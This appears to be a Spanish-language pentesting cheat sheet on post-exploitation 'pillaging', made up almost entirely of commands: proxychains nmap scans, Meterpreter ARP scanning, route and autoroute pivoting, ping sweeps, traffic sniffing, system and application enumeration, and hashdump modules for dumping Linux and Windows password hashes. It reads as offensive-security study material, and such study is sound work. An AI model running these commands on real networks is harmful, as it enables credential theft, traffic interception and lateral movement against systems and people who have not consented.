# Pillaging ## Nmap ```shell proxychains nmap -sT -open -n -Pn --top-ports 25 ``` ## Metasploit ### ARP ```shell # Desde sesión de meterpreter run arp_scanner -r ``` ```shell use post/windows/gather/arp_scanner set RHOSTS set SESSION run ``` ### Interfaces de red ```shell # Desde sesión de meterpreter ifconfig ``` ### Tabla de enrutamiento ```shell # Desde sesión de meterpreter route ``` ### Servicios de red #### Linux/Unix ```shell netstat -antupo ``` * -a = todos los sockets. * -n = hosts, puertos y usuarios en formato numérico. * -t = TCP. * -u = UDP. * -p = PID (Process Identification Number) y nombre del programa. * -o = timer. #### Windows ```shell netstat -ano -p ``` * -a = todos los sockets. * -n = hosts y puertos en formato numérico. * -o = PID (Process Identification Number). * -p = TCP, UDP, TCPv6 o UDPv6. ### Ping sweep ```shell use post/multi/gather/ping_sweep set RHOSTS set SESSION run ``` ### Sniffing ```shell # Desde sesión de meterpreter use sniffer sniffer_interfaces sniffer_start sniffer_dump // sniffer_stop ``` ### Escaneo de puertos ```shell # Tabla de enrutamiento # Incorporación manual route add

# Desde sesión de meterpreter run autoroute -s # Metasploit use auxiliary/scanner/portscan/tcp set RHOSTS set THREADS 10 set PORTS run ``` ### Aplicaciones ```shell # Windows use post/windows/gather/enum_applications set SESSION run ``` ### Enumeración automatizada ```shell # Linux/Unix use post/linux/gather/enum_system set SESSION run # Windowsh # Desde sesión de meterpreter run winenum ``` ### Hashdump ```shell # Linux/Unix use post/linux/gather/hashdump set SESSION run # Windows # Desde sesión de meterpreter hashdump ```